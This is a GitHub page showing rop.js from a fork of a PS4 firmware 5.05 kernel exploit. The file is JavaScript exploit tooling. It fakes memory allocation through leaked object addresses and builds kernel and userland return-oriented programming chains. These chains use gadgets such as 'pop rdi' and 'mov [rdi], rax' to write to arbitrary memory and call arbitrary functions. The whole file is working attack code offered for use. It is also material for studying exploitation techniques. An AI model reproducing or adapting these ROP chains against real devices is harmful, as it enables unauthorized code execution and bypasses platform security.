forked from Cryptogenic/PS4-5.05-Kernel-Exploit
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathrop.js
143 lines (113 loc) · 3.19 KB
/
rop.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
// Basic memory functions
function malloc(size)
{
var backing = new Uint8Array(0x10000 + size);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = backing;
return ptr;
}
function mallocu32(size) {
var backing = new Uint8Array(0x10000 + size * 4);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
function stringify(str)
{
var bufView = new Uint8Array(str.length + 1);
for(var i=0; i < str.length; i++) {
bufView[i] = str.charCodeAt(i) & 0xFF;
}
window.nogc.push(bufView);
return p.read8(p.leakval(bufView).add32(0x10));
}
// Class for quickly creating a kernel ROP chain
var krop = function (p, addr) {
// Contains base and stack pointer for fake stack (this.stackBase = RBP, this.stackPointer = RSP)
this.stackBase = addr;
this.stackPointer = 0;
// Push instruction / value onto fake stack
this.push = function (val) {
p.write8(this.stackBase.add32(this.stackPointer), val);
this.stackPointer += 8;
};
// Write to address with value (helper function)
this.write64 = function (addr, val) {
this.push(window.gadgets["pop rdi"]);
this.push(addr);
this.push(window.gadgets["pop rax"]);
this.push(val);
this.push(window.gadgets["mov [rdi], rax"]);
}
// Return krop object
return this;
};
// Class for quickly creating and managing a ROP chain
window.rop = function() {
this.stack = new Uint32Array(0x10000);
this.stackBase = p.read8(p.leakval(this.stack).add32(0x10));
this.count = 0;
this.clear = function() {
this.count = 0;
this.runtime = undefined;
for(var i = 0; i < 0xFF0 / 2; i++)
{
p.write8(this.stackBase.add32(i*8), 0);
}
};
this.pushSymbolic = function() {
this.count++;
return this.count-1;
}
this.finalizeSymbolic = function(idx, val) {
p.write8(this.stackBase.add32(idx * 8), val);
}
this.push = function(val) {
this.finalizeSymbolic(this.pushSymbolic(), val);
}
this.push_write8 = function(where, what)
{
this.push(gadgets["pop rdi"]);
this.push(where);
this.push(gadgets["pop rsi"]);
this.push(what);
this.push(gadgets["mov [rdi], rsi"]);
}
this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)
{
if (rdi != undefined) {
this.push(gadgets["pop rdi"]);
this.push(rdi);
}
if (rsi != undefined) {
this.push(gadgets["pop rsi"]);
this.push(rsi);
}
if (rdx != undefined) {
this.push(gadgets["pop rdx"]);
this.push(rdx);
}
if (rcx != undefined) {
this.push(gadgets["pop rcx"]);
this.push(rcx);
}
if (r8 != undefined) {
this.push(gadgets["pop r8"]);
this.push(r8);
}
if (r9 != undefined) {
this.push(gadgets["pop r9"]);
this.push(r9);
}
this.push(rip);
return this;
}
this.run = function() {
var retv = p.loadchain(this, this.notimes);
this.clear();
return retv;
}
return this;
};